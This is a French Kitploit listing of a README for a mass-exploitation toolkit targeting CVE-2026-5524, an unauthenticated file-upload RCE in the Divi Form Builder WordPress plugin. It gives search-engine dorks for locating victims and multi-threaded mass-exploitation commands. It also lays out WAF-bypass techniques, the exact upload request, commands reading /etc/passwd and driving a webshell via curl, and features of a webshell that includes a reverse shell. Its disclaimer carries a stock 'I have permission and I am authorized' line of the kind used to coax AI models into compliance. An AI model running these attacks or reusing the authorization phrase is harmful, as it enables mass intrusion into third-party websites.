Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-5524-PoC — Boîte à outils d'exploitation massive pour CVE-2026-5524, une RCE par téléchargement de fichier non authentifié dans Divi Form Builder. Dispose d'un scan multi-thread, de techniques de contournement WAF, de déploiement de webshell personnalisé et d'exécution de commandes interactive. | Kitploit
Outils/GitHubGitHub/caterscam/cve-2026-5524-poc
ReconnaissanceScanners de VulnérabilitésExploitationShellcodeExploitation d'Applications WebCollecte d'InformationsContournement de WAFTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Red Teaming
Développement de Charges Utiles
GitHubcaterscam/cve-2026-5524-poc

CVE-2026-5524-PoC

Voir le dépôt
114il y a 2 moisPas encore vérifié

À propos

Boîte à outils d'exploitation massive pour CVE-2026-5524, une RCE par téléchargement de fichier non authentifié dans Divi Form Builder. Dispose d'un scan multi-thread, de techniques de contournement WAF, de déploiement de webshell personnalisé et d'exécution de commandes interactive.

Partager

CVE-2026-5524 — RCE non authentifiée dans Divi Form Builder

Kit d'exploitation de masse pour CVE-2026-5524, une vulnérabilité de téléversement arbitraire de fichier non authentifié dans le plugin WordPress Divi Form Builder <= 5.1.8 menant à une exécution de code à distance.

version Devon Aji python telegram

ChampValeur
CVE2026-5524
CVSS9.8 (Critique)
VecteurAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Version affectéeDivi Form Builder <= 5.1.8
Version corrigée5.1.9
TypeTéléversement de fichier non authentifié menant à une RCE
Chercheur0xd4rk5id3 - EnvoraSec

Sommaire

  • Description
  • Dorks
  • Installation
  • Usage
    • Cible unique
    • Exploitation de masse
    • Contournement avancé
    • Exécution de commande
  • Détails de la vulnérabilité
  • Techniques de contournement
  • Pile technique
  • Structure du projet
  • Déroulement de l'attaque
  • Avertissement

Description

Le plugin Divi Form Builder pour WordPress contient une vulnérabilité de téléversement arbitraire de fichier non authentifié. Le gestionnaire do_image_upload() transmet le paramètre POST acceptFileTypes, contrôlé par l'utilisateur, directement dans une expression régulière utilisée pour valider les extensions de fichiers. En fournissant une valeur telle que phtml, un attaquant peut contourner la règle .htaccess du plugin qui ne bloque que l'extension .php et téléverser un webshell avec une extension exécutable par PHP (.phtml, .phar, .php5, .php7, etc.).

Une fois le fichier placé dans /wp-content/uploads/de_fb_uploads/, Apache l'exécute en tant que PHP, ce qui permet à l'attaquant d'obtenir une exécution de code à distance avec les droits de l'utilisateur du serveur web.

Le problème est corrigé dans Divi Form Builder 5.1.9.


Dorks

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

Installation

Prérequis : Python 3.8 ou plus récent sous Linux, macOS ou WSL.

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Usage

Cible unique

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

Exploitation de masse

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

Contournement avancé

Pour les cibles derrière un WAF (NinjaFirewall, Wordfence, ModSecurity) ou avec une configuration Apache ou nginx durcie.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

Exécution de commande

Après un téléversement réussi, le script peut immédiatement exécuter une commande ou ouvrir un shell interactif.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

Options

OptionDescription
-u URLURL de la cible unique
-l FILEFichier contenant la liste des cibles, une URL par ligne
-t NNombre de threads simultanés (défaut 10)
--timeout NDélai d'expiration des requêtes en secondes (défaut 15)
-o FILEEnregistrer les résultats dans un fichier JSONL
--proxy URLAcheminer le trafic via un proxy HTTP
--nonce HASHUtiliser un nonce fourni manuellement, ignorer la détection automatique
--ext EXTForcer une seule extension au lieu de la liste complète de contournement
--shellOuvrir un shell RCE interactif en cas de succès (cible unique uniquement)
--cmd CMDExécuter une commande sur la cible, puis quitter
--shell-file FILETéléverser un payload shell personnalisé au lieu de celui intégré
--no-verifyIgnorer l'étape de vérification RCE post-téléversement
--strict-verifyConfirmer que l'URL du shell renvoie HTTP 200 pour filtrer les faux positifs
--user-iniTéléverser un dropper .user.ini pour les environnements PHP-FPM
--htaccessTéléverser un réactivateur .htaccess pour les environnements Apache
--aggressiveActiver toutes les techniques de contournement disponibles
--null-byteInclure les tentatives avec octet nul et double extension
--path-traversalTenter le téléversement dans les sous-répertoires /uploads/YYYY/MM/
--debugAfficher les réponses HTTP brutes pour le diagnostic

Détails de la vulnérabilité

Code vulnérable

Le gestionnaire vulnérable construit une expression régulière à partir de l'entrée utilisateur sans assainissement.

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

En envoyant acceptFileTypes=phtml, l'expression régulière résultante /\.(phtml)$/i correspond aux noms de fichiers se terminant par .phtml, même si le fichier .htaccess du plugin ne bloque que l'extension .php. Apache exécute ensuite le fichier téléversé en tant que PHP, ce qui produit une exécution de code à distance.

Chaîne d'attaque confirmée

  1. Explorez une page qui intègre un formulaire Divi Form Builder (/, /contact, /quote, etc.). Ajoutez un paramètre ?nocache=<random> pour neutraliser Varnish, WP Rocket et autres caches de pages qui serviraient sinon un nonce obsolète.

  2. Extrayez la valeur fb_nonce de l'objet JavaScript localisé :

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. Envoyez un formulaire multipart en POST vers /wp-admin/admin-ajax.php avec :

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. Lisez l'URL du fichier dans la réponse JSON :

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. Interrogez le shell avec une commande encodée en base64 :

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

Techniques de contournement

#TechniqueCibles
1Extensions PHP alternatives .phtml, .phar, .php5, .php7, .php4, .pht, .shtmlRègle .htaccess du plugin qui ne bloque que .php
2Variation de casse .PHTML, .PHP5, .PhTmLSignatures WAF sensibles à la casse (NinjaFirewall)
3Double extension .phtml.jpg, .php.jpgParticularités de négociation de contenu d'Apache mod_mime
4Octet nul .php%00.jpg, .phtml%00.txtAnciennes versions de PHP (antérieures à 5.3.4) et certains analyseurs
5Espace ou point final .php , .php.IIS Windows et anciennes versions d'Apache
6Usurpation du Content-Type application/octet-streamWAF qui se basent sur l'en-tête Content-Type multipart
7Téléverser un véritable .htaccess qui réactive PHP pour .gif, .png, .jpg, .txt, .html, etc.Serveurs Apache avec AllowOverride All
8Téléverser un .user.ini avec auto_prepend_fileEnvironnements PHP-FPM
9Injection dans le nom de fichier via la manipulation de la limite multipartProxies et WAF qui ré-analysent le corps de la requête
10Traversée de chemin ../shell.phtml dans le nom de fichierRestrictions de répertoires du plugin

Le script essaie chaque technique par ordre de priorité et, lorsque --aggressive est défini, tente chacune d'elles même après que le premier téléversement a signalé un succès.


Pile technique

Script d'exploitation

ComposantTechnologie
LangagePython 3.8+
Client HTTPrequests
Gestion TLSurllib3 en mode non sécurisé pour les certificats auto-signés
Concurrenceconcurrent.futures.ThreadPoolExecutor pour le scan de masse
Analysere pour l'extraction du nonce, json pour le traitement des réponses
Encodagebase64 pour le paramètre de commande du webshell
CLIargparse avec 19 options configurables

Shell personnalisé (bypass.phtml)

ComposantTechnologie
LangagePHP 7.0+
Fonctions d'exécutionsystem(), shell_exec(), proc_open(), passthru(), popen()
InterfaceFormulaire HTML simple, sans framework JavaScript
FonctionnalitésExplorateur de fichiers, exécution de commande, accès à la base de données, reverse shell, .htaccess et .user.ini auto-installés
TailleEnviron 16 Ko
Niveaux de contournementSix chemins d'exécution indépendants plus des payloads encodés

Structure du projet

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          Main exploit script
|-- bypass.phtml              16 KB multi-layer PHP webshell
|-- htaccess_enable.phtml     Dropper that writes a re-enabling .htaccess
|-- user_ini.phtml            Dropper that writes a .user.ini for PHP-FPM
|-- targets.txt               Example target list
|-- pwned.jsonl               Generated by the -o flag during mass scans
|-- requirements.txt          Python dependencies
`-- README.md                 This document

Déroulement de l'attaque

root@kitploit:~
+--------------------------------------------------+
| 1. Recon                                         |
|    GET /?nocache=<random>                        |
|    Parse fb_nonce from de_fb_obj                 |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. Craft exploit                                 |
|    POST /wp-admin/admin-ajax.php                 |
|    action=de_fb_image_upload                     |
|    acceptFileTypes=phtml                         |
|    [email protected]                             |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. Server accepts and stores file                |
|    /uploads/de_fb_uploads/<random>.phtml         |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. Execute                                       |
|    GET shell.phtml?x=base64(command)             |
|    Remote code execution achieved                |
+--------------------------------------------------+

Avertissement

Cet outil est fourni à des fins éducatives et pour une utilisation lors d'engagements de test d'intrusion autorisés. Des exemples d'utilisation acceptable incluent :

  • Les programmes de bug bounty qui autorisent explicitement le test de la cible
  • Les compétitions Capture the flag et les environnements de laboratoire dédiés
  • Les évaluations de sécurité internes avec l'autorisation écrite du propriétaire de l'actif
  • La recherche académique en sécurité menée dans un environnement contrôlé

L'utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de tester est illégale dans pratiquement toutes les juridictions et est strictement interdite. L'auteur ne cautionne pas et n'assume aucune responsabilité en cas d'utilisation abusive de ce code.

J'ai la permission et je suis autorisé à effectuer ce pentest. (I have permission and I am authorized to perform this pentest.)

Les lois potentiellement applicables incluent la loi indonésienne UU ITE, le Computer Fraud and Abuse Act des États-Unis, la Convention sur la cybercriminalité de l'Union européenne et les législations équivalentes ailleurs. En cas de doute, obtenez d'abord une autorisation écrite.


Licence

Usage éducatif uniquement. Consultez la section avertissement pour les conditions complètes d'utilisation.

Télécharger l’outil